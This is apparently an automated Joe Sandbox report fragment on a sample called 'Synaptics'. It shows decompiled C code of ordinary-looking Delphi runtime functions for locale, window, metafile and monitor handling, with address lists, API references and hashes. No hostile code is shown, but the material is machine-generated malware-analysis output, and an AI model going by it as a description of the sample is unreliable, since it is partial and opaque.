                                                                                                                                                                                                                            0x0040e4f9
                                                                                                                                                                                                                            0x0040e503
                                                                                                                                                                                                                            0x0040e508
                                                                                                                                                                                                                            0x0040e50a
                                                                                                                                                                                                                            0x0040e51c
                                                                                                                                                                                                                            0x0040e52d
                                                                                                                                                                                                                            0x0040e546
                                                                                                                                                                                                                            0x0040e52f
                                                                                                                                                                                                                            0x0040e537
                                                                                                                                                                                                                            0x0040e537
                                                                                                                                                                                                                            0x0040e52d
                                                                                                                                                                                                                            0x0040e54b
                                                                                                                                                                                                                            0x0040e54e
                                                                                                                                                                                                                            0x0040e551
                                                                                                                                                                                                                            0x0040e556
                                                                                                                                                                                                                            0x0040e563
                                                                                                                                                                                                                            0x0040e568
                                                                                                                                                                                                                            0x0040e56b
                                                                                                                                                                                                                            0x0040e56e
                                                                                                                                                                                                                            0x0040e573
                                                                                                                                                                                                                            0x0040e580
                                                                                                                                                                                                                            0x0040e593
                                                                                                                                                                                                                            0x0040e59a
                                                                                                                                                                                                                            0x0040e59d
                                                                                                                                                                                                                            0x0040e5a0
                                                                                                                                                                                                                            0x0040e5b2

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,0040E5B3,?,?,00000000,00000000), ref: 0040E31E
                                                                                                                                                                                                                              • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                                                                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                            • API String ID: 4232894706-2493093252
                                                                                                                                                                                                                            • Opcode ID: 7a4ec08d60e7301cad96d7fb6775c5cef7f2f9e679167df0a97288120caaca56
                                                                                                                                                                                                                            • Instruction ID: 2ac3dc33e66767ce4b71c968eb597fff0a4fdc25e0501dc74ddfc3eea00af484
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a4ec08d60e7301cad96d7fb6775c5cef7f2f9e679167df0a97288120caaca56
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47612FB07002489BDB00EBF6D881A9E76A59B98704F50993BB100BB3C6DA3DDD15971D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004388F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 139threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                            			E004388F0(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				char _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t78;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr* _t104;
				intOrPtr _t106;
				intOrPtr _t110;
				intOrPtr _t112;
				struct HWND__* _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t117;

				_t102 = __ecx;
				_t101 = __eax;
				_v5 = 1;
				_t113 = E00438D40(_a4 + 0xfffffff7);
				_v24 = _t113;
				_t53 = GetWindow(_t113, "true");
				_t104 =  *0x49dbcc; // 0x49ebb8
				_t4 =  *_t104 + 0x30; // 0x70374
				if(_t53 ==  *_t4) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t114 = _t101;
					while(1) {
						_t55 =  *((intOrPtr*)(_t114 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t114 = _t55;
					}
					_t112 = E00441704(_t114);
					_v28 = _t112;
					if(_t112 == _v24) {
						goto L25;
					}
					_t13 = _a4 - 0x10; // 0xe87d83e8
					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
					if(_t60 == 0) {
						_t19 = _a4 - 0x10; // 0xe87d83e8
						_t106 =  *0x437498; // 0x4374e4
						__eflags = E00403D78( *_t19, _t106);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t21 = _a4 - 0x10; // 0xe87d83e8
							_v32 = E00441704( *_t21);
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						_push( &_v32);
						_push(E00438884);
						_push(GetCurrentThreadId());
						L004075C8();
						_t126 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E00403DE8(_t101, _t126);
						_t78 =  *0x49eb38; // 0x0
						_t110 =  *0x4360a0; // 0x4360ec
						if(E00403D78(_t78, _t110) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t84 =  *0x49eb38; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t86 =  *0x49eb38; // 0x0
						if(E00441704( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t116 = _t60;
					while(1) {
						_t93 =  *((intOrPtr*)(_t116 + 0x30));
						if(_t93 == 0) {
							break;
						}
						_t116 = _t93;
					}
					_v32 = E00441704(_t116);
					goto L19;
				}
				_t117 = E00437E5C(_v24, _t102);
				if(_t117 == 0) {
					goto L25;
				} else {
					while(1) {
						_t98 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t98 == 0) {
							break;
						}
						_t117 = _t98;
					}
					_v24 = E00441704(_t117);
					goto L6;
				}
			}































                                                                                                                                                                                                                            0x004388f0
                                                                                                                                                                                                                            0x004388f9
                                                                                                                                                                                                                            0x004388fb
                                                                                                                                                                                                                            0x0043890a
                                                                                                                                                                                                                            0x0043890c
                                                                                                                                                                                                                            0x00438912
                                                                                                                                                                                                                            0x00438917
                                                                                                                                                                                                                            0x0043891f
                                                                                                                                                                                                                            0x00438922
                                                                                                                                                                                                                            0x0043894b
                                                                                                                                                                                                                            0x0043894f
                                                                                                                                                                                                                            0x00438a7e
                                                                                                                                                                                                                            0x00438a87
                                                                                                                                                                                                                            0x00438a87
                                                                                                                                                                                                                            0x00438955
                                                                                                                                                                                                                            0x0043895b
                                                                                                                                                                                                                            0x0043895b
                                                                                                                                                                                                                            0x00438960
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438959
                                                                                                                                                                                                                            0x00438959
                                                                                                                                                                                                                            0x00438969
                                                                                                                                                                                                                            0x0043896b
                                                                                                                                                                                                                            0x00438971
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043897a
                                                                                                                                                                                                                            0x0043897d
                                                                                                                                                                                                                            0x00438982
                                                                                                                                                                                                                            0x004389a3
                                                                                                                                                                                                                            0x004389a6
                                                                                                                                                                                                                            0x004389b1
                                                                                                                                                                                                                            0x004389b3
                                                                                                                                                                                                                            0x004389c5
                                                                                                                                                                                                                            0x004389c7
                                                                                                                                                                                                                            0x004389b5
                                                                                                                                                                                                                            0x004389b8
                                                                                                                                                                                                                            0x004389c0
                                                                                                                                                                                                                            0x004389c0
                                                                                                                                                                                                                            0x004389ca
                                                                                                                                                                                                                            0x004389ca
                                                                                                                                                                                                                            0x004389ce
                                                                                                                                                                                                                            0x004389d4
                                                                                                                                                                                                                            0x004389da
                                                                                                                                                                                                                            0x004389e0
                                                                                                                                                                                                                            0x004389e1
                                                                                                                                                                                                                            0x004389eb
                                                                                                                                                                                                                            0x004389ec
                                                                                                                                                                                                                            0x004389f1
                                                                                                                                                                                                                            0x004389f5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438a03
                                                                                                                                                                                                                            0x00438a0e
                                                                                                                                                                                                                            0x00438a13
                                                                                                                                                                                                                            0x00438a23
                                                                                                                                                                                                                            0x00438a28
                                                                                                                                                                                                                            0x00438a2d
                                                                                                                                                                                                                            0x00438a3a
                                                                                                                                                                                                                            0x00438a65
                                                                                                                                                                                                                            0x00438a78
                                                                                                                                                                                                                            0x00438a7a
                                                                                                                                                                                                                            0x00438a7a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438a78
                                                                                                                                                                                                                            0x00438a3c
                                                                                                                                                                                                                            0x00438a4b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438a4d
                                                                                                                                                                                                                            0x00438a63
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438a63
                                                                                                                                                                                                                            0x00438987
                                                                                                                                                                                                                            0x0043898d
                                                                                                                                                                                                                            0x0043898d
                                                                                                                                                                                                                            0x00438992
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043898b
                                                                                                                                                                                                                            0x0043898b
                                                                                                                                                                                                                            0x0043899b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043899b
                                                                                                                                                                                                                            0x0043892c
                                                                                                                                                                                                                            0x00438930
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438936
                                                                                                                                                                                                                            0x0043893a
                                                                                                                                                                                                                            0x0043893a
                                                                                                                                                                                                                            0x0043893f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438938
                                                                                                                                                                                                                            0x00438938
                                                                                                                                                                                                                            0x00438948
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438948

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00438D40: WindowFromPoint.USER32(00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438D46
                                                                                                                                                                                                                              • Part of subcall function 00438D40: GetParent.USER32(00000000), ref: 00438D5D
                                                                                                                                                                                                                            • GetWindow.USER32(00000000,?), ref: 00438912
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004389E6
                                                                                                                                                                                                                            • 73C9AC10.USER32(00000000,00438884,?,00000000,?,?,-0000000C,?), ref: 004389EC
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 00438A03
                                                                                                                                                                                                                            • IntersectRect.USER32 ref: 00438A71
                                                                                                                                                                                                                              • Part of subcall function 00437E5C: GetWindowThreadProcessId.USER32(00000000), ref: 00437E69
                                                                                                                                                                                                                              • Part of subcall function 00437E5C: GetCurrentProcessId.KERNEL32(?,?,00000000,0045A3E7,?,?,0049ABD1,00000001,0045A553,?,?,?,0049ABD1), ref: 00437E72
                                                                                                                                                                                                                              • Part of subcall function 00437E5C: GlobalFindAtomA.KERNEL32(00000000), ref: 00437E87
                                                                                                                                                                                                                              • Part of subcall function 00437E5C: GetPropA.USER32 ref: 00437E9E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$CurrentProcessRectThread$AtomFindFromGlobalIntersectParentPointProp
                                                                                                                                                                                                                            • String ID: `C$tC
                                                                                                                                                                                                                            • API String ID: 2049660638-2788972245
                                                                                                                                                                                                                            • Opcode ID: dba84d86d5a6676c331673e93b0d571f08622f392858292f363986459535cfd1
                                                                                                                                                                                                                            • Instruction ID: 3581ce7dd3e3bfbf2e623d4eb096478338c089ca1b68be53d8a0d9a7386b4eb1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dba84d86d5a6676c331673e93b0d571f08622f392858292f363986459535cfd1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6515F75A002099FCB10DFA9C481BAEB7F4AF08354F14516AF855EB351DB38ED41CB9A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045A8A4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetActiveWindow.USER32 ref: 0045A8B7
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 0045A911
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0045A949
                                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 0045A98A
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045AA00,?,00000000,0045A9F9), ref: 0045A9DA
                                                                                                                                                                                                                            • SetActiveWindow.USER32(?,0045AA00,?,00000000,0045A9F9), ref: 0045A9EB
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$Active$MessageRect
                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                            • API String ID: 3147912190-3887548279
                                                                                                                                                                                                                            • Opcode ID: 0a2ee42d7a16d8424a56c7e2c40748980ad704c4b7b461ab7389184e891e9d68
                                                                                                                                                                                                                            • Instruction ID: aa5883e2080ee4b6071f7524ee1856c0ab285683fbf4ba5b2f0a51d728674732
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a2ee42d7a16d8424a56c7e2c40748980ad704c4b7b461ab7389184e891e9d68
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35414EB5E00108AFDB04DBA9CD85FAE77F9FB48305F14456AF900E7392D674AD048B55
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00428300 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00428300(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E0042819C(__eax);
				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00426DA8( &_v38) != _v18) {
					E00425F58();
				}
				_v12 = _v12 - 0x16;
				_v16 = E0040275C(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x42846f, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E00425F58();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), "true",  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E00425F58();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(0x428476);
				return E0040277C(_v16);
			}


























                                                                                                                                                                                                                            0x00428301
                                                                                                                                                                                                                            0x00428303
                                                                                                                                                                                                                            0x0042830c
                                                                                                                                                                                                                            0x0042830f
                                                                                                                                                                                                                            0x00428312
                                                                                                                                                                                                                            0x00428316
                                                                                                                                                                                                                            0x00428328
                                                                                                                                                                                                                            0x00428332
                                                                                                                                                                                                                            0x00428342
                                                                                                                                                                                                                            0x00428342
                                                                                                                                                                                                                            0x00428347
                                                                                                                                                                                                                            0x00428353
                                                                                                                                                                                                                            0x00428356
                                                                                                                                                                                                                            0x00428364
                                                                                                                                                                                                                            0x00428372
                                                                                                                                                                                                                            0x0042837c
                                                                                                                                                                                                                            0x00428385
                                                                                                                                                                                                                            0x00428387
                                                                                                                                                                                                                            0x00428387
                                                                                                                                                                                                                            0x004283a7
                                                                                                                                                                                                                            0x004283c4
                                                                                                                                                                                                                            0x004283c7
                                                                                                                                                                                                                            0x004283d0
                                                                                                                                                                                                                            0x004283d5
                                                                                                                                                                                                                            0x004283da
                                                                                                                                                                                                                            0x004283f0
                                                                                                                                                                                                                            0x004283f2
                                                                                                                                                                                                                            0x004283f7
                                                                                                                                                                                                                            0x004283f9
                                                                                                                                                                                                                            0x004283f9
                                                                                                                                                                                                                            0x0042840b
                                                                                                                                                                                                                            0x00428410
                                                                                                                                                                                                                            0x0042841a
                                                                                                                                                                                                                            0x00428420
                                                                                                                                                                                                                            0x00428425
                                                                                                                                                                                                                            0x0042842c
                                                                                                                                                                                                                            0x00428444
                                                                                                                                                                                                                            0x00428446
                                                                                                                                                                                                                            0x0042844b
                                                                                                                                                                                                                            0x0042844d
                                                                                                                                                                                                                            0x0042844d
                                                                                                                                                                                                                            0x00428452
                                                                                                                                                                                                                            0x00428458
                                                                                                                                                                                                                            0x0042845b
                                                                                                                                                                                                                            0x0042845e
                                                                                                                                                                                                                            0x0042846e

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283A2
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283BF
                                                                                                                                                                                                                            • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 004283EB
                                                                                                                                                                                                                            • GetEnhMetaFileHeader.GDI32(00000016,?,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042840B
                                                                                                                                                                                                                            • DeleteEnhMetaFile.GDI32(00000016), ref: 0042842C
                                                                                                                                                                                                                            • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,?,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 0042843F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileMeta$Bits$DeleteHeader
                                                                                                                                                                                                                            • String ID: `
                                                                                                                                                                                                                            • API String ID: 1990453761-2679148245
                                                                                                                                                                                                                            • Opcode ID: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                                                                                                                                                                                            • Instruction ID: d131a5009b9ae6a1c3985c7f4bbb4479256416dcbb727d86a178af25fe9cd39a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7410F75E00218AFDB00DFA9D485AAEB7F9EF48710F50846AF904F7281E7799D40CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042C82C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E0042C82C(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x49e92c != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407298();
						}
						_t24 = 1;
					}
				} else {
					 *0x49e910 = E0042C4FC(4, _t23,  *0x49e910, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}













                                                                                                                                                                                                                            0x0042c835
                                                                                                                                                                                                                            0x0042c838
                                                                                                                                                                                                                            0x0042c842
                                                                                                                                                                                                                            0x0042c867
                                                                                                                                                                                                                            0x0042c86f
                                                                                                                                                                                                                            0x0042c88f
                                                                                                                                                                                                                            0x0042c894
                                                                                                                                                                                                                            0x0042c89f
                                                                                                                                                                                                                            0x0042c8aa
                                                                                                                                                                                                                            0x0042c8b4
                                                                                                                                                                                                                            0x0042c8b5
                                                                                                                                                                                                                            0x0042c8b6
                                                                                                                                                                                                                            0x0042c8b7
                                                                                                                                                                                                                            0x0042c8b8
                                                                                                                                                                                                                            0x0042c8b9
                                                                                                                                                                                                                            0x0042c8c3
                                                                                                                                                                                                                            0x0042c8c5
                                                                                                                                                                                                                            0x0042c8cd
                                                                                                                                                                                                                            0x0042c8ce
                                                                                                                                                                                                                            0x0042c8ce
                                                                                                                                                                                                                            0x0042c8d3
                                                                                                                                                                                                                            0x0042c8d3
                                                                                                                                                                                                                            0x0042c844
                                                                                                                                                                                                                            0x0042c856
                                                                                                                                                                                                                            0x0042c863
                                                                                                                                                                                                                            0x0042c863
                                                                                                                                                                                                                            0x0042c8dd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetMonitorInfoA.USER32(?,?), ref: 0042C85D
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C884
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C899
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C8A4
                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C8CE
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                                                                                                                                                                            • String ID: DISPLAY$GetMonitorInfo
                                                                                                                                                                                                                            • API String ID: 1539801207-1633989206
                                                                                                                                                                                                                            • Opcode ID: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
                                                                                                                                                                                                                            • Instruction ID: fd539ca8d8add89cf6c2a40af9093eb6b2d142832e41177ff4ac11c4fa6a4bef
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3211E4B17013109FD720EF66AC84BABB7E9EB05712F40893BE815D7240D3B5A900CBA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00406B91 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00406B91(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x49e5bc)) =  *((intOrPtr*)(__eax - 0x49e5bc)) + __eax - 0x49e5bc;
				 *0x49b00c = 2;
				 *0x49e014 = 0x40124c;
				 *0x49e018 = 0x40125c;
				 *0x49e04e = 2;
				 *0x49e000 = E00405998;
				if(E00403A2C() != 0) {
					_t3 = E00403A5C();
				}
				E00403B20(_t3);
				 *0x49e054 = 0xd7b0;
				 *0x49e220 = 0xd7b0;
				 *0x49e3ec = 0xd7b0;
				 *0x49e040 = GetCommandLineA();
				 *0x49e03c = E004013AC();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x49e5c0 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x49e034 = _t11;
				return _t11;
			}





                                                                                                                                                                                                                            0x00406b91
                                                                                                                                                                                                                            0x00406b96
